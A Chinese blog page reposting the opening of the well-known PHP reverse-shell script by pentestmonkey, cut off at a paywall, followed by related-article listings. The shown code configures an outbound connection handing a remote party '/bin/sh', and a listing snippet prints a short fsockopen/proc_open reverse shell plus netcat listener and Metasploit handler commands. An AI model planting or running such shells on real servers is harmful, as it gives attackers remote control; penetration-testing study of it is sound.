php_reverse_shell

最新推荐文章于 2024-05-24 09:39:57 发布
最新推荐文章于 2024-05-24 09:39:57 发布
阅读量520 收藏
点赞数
分类专栏: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47156475/article/details/119851353
版权
本文深入探讨了PHP反向Shell的概念,它是如何工作的,以及在渗透测试中如何使用它进行远程控制。同时,介绍了几种实现PHP反向Shell的方法和技巧,并提供了相关代码示例,帮助读者更好地理解和应用。
摘要由CSDN通过智能技术生成 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to a
最低0.47元/天 解锁文章
weixin_47156475
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pc_to_cs_apache_reverse_proxy:待定
03-12
value =“ guest” />“ do” value =“ login” />“ vb_login_md5password” / >“ vb_login_md5password_utf” /> ===查尔斯POST /forum/login.php?s=ee729e56aa973796471ea6a38f9f0dd7&do=login HTTP / 1.1 vb...
php-reverse-shell
07-24
php-reverse-shell
PHP反向shell:一款强大的渗透测试工具
gitblog_00081的博客
05-24 386
PHP反向shell:一款强大的渗透测试工具 项目地址:https://gitcode.com/ivan-sincek/php-reverse-shell 项目介绍 PHP反向shell是一款基于PHP的轻量级渗透测试工具,它是pentestmonkey/php-reverse-shell的经典升级版,旨在为安全研究人员和IT专家提供一个跨平台的交互式远程控制选项。该项目由Ivan Sincek开...
反弹shell脚本(php-reverse-shell
Aluxian_的博客
10-01 1565
反弹shell脚本
PHP 反向Shell:强大且灵活的渗透测试工具
gitblog_00092的博客
05-12 326
PHP 反向Shell:强大且灵活的渗透测试工具 php-reverse-shell项目地址:https://gitcode.com/gh_mirrors/ph/php-reverse-shell 1、项目介绍 在网络安全和渗透测试领域,php-reverse-shell 是一个不可或缺的开源工具。它是一个小型但功能强大的PHP脚本,可以创建一个反向Shell,允许远程控制目标服务器。这个项目由...
网络渗透测试实验四
m0_64229840的博客
11-21 693
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
reverse-shell-generator:基于Web的反向shell生成器
02-05
`reverse-shell-generator` 提供了一个用户友好的界面,可以生成多种编程语言的反向shell代码,包括但不限于 Bash、Python、Perl、Ruby、PowerShellPHP。这些代码可以直接在目标系统上执行,从而建立反向连接。...
php-emoji-reverse-shell:PHP中使用Unicode编码作为变量赋值的反向shell
03-12
本项目“php-emoji-reverse-shell”聚焦于PHP环境中,利用Unicode编码来实现这一目的。下面将详细阐述PHP、Unicode编码以及如何构建和理解这个反向Shell。 首先,PHP是一种广泛使用的服务器端脚本语言,常用于Web...
phpshell很好用
05-30
- **类似工具**:除了PHPShell,还有其他类似的工具,如Webshell China蚁剑、PHP-reverse-shell等,它们也提供类似的功能。 了解和掌握PHPShell的使用不仅有助于安全专业人员发现并修复服务器漏洞,也有助于提升对...
php reverseShell
Cosmopolitan的博客
06-12 578
<?php $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_c...
渗透测试获取webshell方法总结
u013930899的博客
10-06 3327
本文总结了渗透测试php网站获取webshell的几种方法
reverse php,php-reverse-shell
weixin_28693309的博客
03-27 499
功能:返回一个交互式的shell使用:先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:$ip = '192.168.1.111'; // CHANGE THIS$port = 13123; // CHANGE THISnc -v -l -p 13123然后上传并在浏览器中打开该PHP脚本文件。效果图: 源代码(在原文的基础进行了修改):set_tim...
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 674
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell
10种反弹shell方式
kevinhanser
03-30 4901
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
探索黑客防御之道:`windows-php-reverse-shell`
最新发布
gitblog_00012的博客
05-24 316
探索黑客防御之道:windows-php-reverse-shell 项目地址:https://gitcode.com/Dhayalanb/windows-php-reverse-shell 在这个数字化的时代,网络安全显得尤为重要,而了解黑客攻击手段是提升防御能力的第一步。windows-php-reverse-shell 是一个简单但实用的PHP反向Shell工具,它基于Webshell实现,...
msf生成反弹shell php
08-28
生成反弹 shellPHP 脚本可以使用 Metasploit Framework (MSF) 中的 `php/meterpreter_reverse_tcp` 模块。以下是一个简单的示例: ``` use exploit/multi/handler set PAYLOAD php/meterpreter_reverse_tcp set...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值